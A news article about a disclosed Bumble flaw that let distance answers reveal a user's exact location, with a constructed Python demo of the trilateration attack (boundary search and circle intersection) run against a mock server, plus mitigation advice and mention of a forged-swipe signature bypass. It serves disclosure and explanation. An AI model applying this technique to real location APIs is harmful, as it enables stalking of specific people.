A software engineer uncovered a vulnerability in the popular dating app Bumble that let an attacker pinpoint the exact location of any user.
Robert Heaton, a software engineer, took on the role of a white-hat hacker and reported the flaw before it could be abused.
After noticing the potential flaw, he carried out a ‘trilateration’ attack. An automated script sent a sequence of requests to Bumble’s servers, each time relocating the ‘attacker’ before asking the server for the distance to the victim.
Because the app reports distances only in whole miles, an attacker who moves in small steps can find the exact spot where a user’s reported distance flips from 3 to 4 miles, and that spot lies at a known true distance from the victim. Repeating this from three different positions yields three exact distances, i.e. three circles around the victim, and their intersection pins down the victim’s whereabouts. This is trilateration (working from distances) rather than triangulation (working from angles).
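The attack described above, as an added example that is not code from the original article or from Heaton’s own script: a Python model of a distance endpoint that rounds down to whole miles, the step-and-bisect search for the point where the reported distance ticks up, and the intersection of the three resulting circles. The rounding rule, the flat-plane coordinates in miles, the victim position and the probe starting points are all assumptions constructed for the demo, not details from Bumble’s real API.

```python
import math

# Constructed example data: the victim's position in a local flat-plane
# coordinate system measured in miles (the server knows it, the attacker does not).
VICTIM = (1.234, -0.567)


class LeakyDistanceServer:
    """Model of the leaky endpoint (an assumption, not Bumble's real API):
    it accepts the caller's claimed position and answers with the distance
    to the target rounded down to whole miles."""

    def __init__(self, victim):
        self._victim = victim
        self.requests = 0  # how many API calls the attack needed

    def distance_miles(self, attacker):
        self.requests += 1
        dx = attacker[0] - self._victim[0]
        dy = attacker[1] - self._victim[1]
        return math.floor(math.hypot(dx, dy))


def find_boundary(server, start, bearing, step=0.5, tol=1e-7, max_steps=200):
    """Relocate the attacker along a straight line from `start` until the
    reported whole-mile distance ticks up (e.g. 3 -> 4), then bisect between
    the last two positions to find where the tick happens. Under floor
    rounding that point lies at exactly `target` miles from the victim, so
    the result is a (point, radius) pair: one circle the victim is on."""
    ux, uy = math.cos(bearing), math.sin(bearing)

    def at(t):
        return (start[0] + t * ux, start[1] + t * uy)

    prev_t, prev_d = 0.0, server.distance_miles(at(0.0))
    for i in range(1, max_steps + 1):
        t = i * step
        d = server.distance_miles(at(t))
        if d > prev_d:  # reported distance just ticked up between prev_t and t
            break
        prev_t, prev_d = t, d
    else:
        raise RuntimeError("no distance tick observed along this bearing")

    target = d  # the reported value just after the tick
    lo, hi = prev_t, t  # reported < target at lo, >= target at hi
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if server.distance_miles(at(mid)) >= target:
            hi = mid
        else:
            lo = mid
    return at(hi), float(target)


def trilaterate(circles):
    """Solve for the point common to three circles ((x, y), r). Subtracting
    the first circle's equation from the other two leaves two linear
    equations in (x, y), solved here with Cramer's rule."""
    (x1, y1), r1 = circles[0]
    (x2, y2), r2 = circles[1]
    (x3, y3), r3 = circles[2]
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = r1**2 - r2**2 - x1**2 + x2**2 - y1**2 + y2**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = r1**2 - r3**2 - x1**2 + x3**2 - y1**2 + y3**2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("probe points are collinear; pick other bearings")
    x = (c1 * b2 - c2 * b1) / det
    y = (a1 * c2 - a2 * c1) / det
    return (x, y)


def locate_victim(server, probes):
    """Run the attack: one boundary search per (start, bearing) probe, then
    intersect the resulting circles."""
    circles = [find_boundary(server, start, bearing) for start, bearing in probes]
    return trilaterate(circles), circles


def demo():
    server = LeakyDistanceServer(VICTIM)
    # Constructed probe positions: three widely separated starting points
    # and headings so the three boundary points are not collinear.
    probes = [((0.0, 0.0), 0.0),            # head east
              ((5.0, 5.0), -math.pi / 2),   # head south
              ((-3.0, 2.0), math.pi)]       # head west
    estimate, circles = locate_victim(server, probes)
    return estimate, circles, server.requests


if __name__ == "__main__":
    est, circles, n = demo()
    for (px, py), r in circles:
        print(f"boundary at ({px:.3f}, {py:.3f}) -> victim is {r:.0f} mi away")
    print(f"estimated victim position: ({est[0]:.4f}, {est[1]:.4f}) after {n} requests")
```

The bisection only needs the server to answer "at least N miles or not", so coarse rounding does nothing to stop it; the usual mitigation is to snap the reported distance to a coarse grid that does not move with the requester, or to add noise that is fixed per target rather than per request.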
Heaton also found a second flaw in a different Bumble function. By bypassing the signature checks Bumble applies to API requests, he could forge ‘Swipe Yes’ requests without paying the fee the app normally charges for them.
Bumble Fixes the Bug
Heaton shared his findings with the company, which fixed the vulnerability within 72 hours and rewarded him with $2,000 for the discovery.
Dating apps have been rising in popularity, especially since the COVID-19 crisis. They are fun, but users are advised to install a VPN on their phone and always run a background check on potential dates. Note that a VPN only masks your IP address, not the location the app itself reports to its servers, so it would not have protected against a flaw like this one.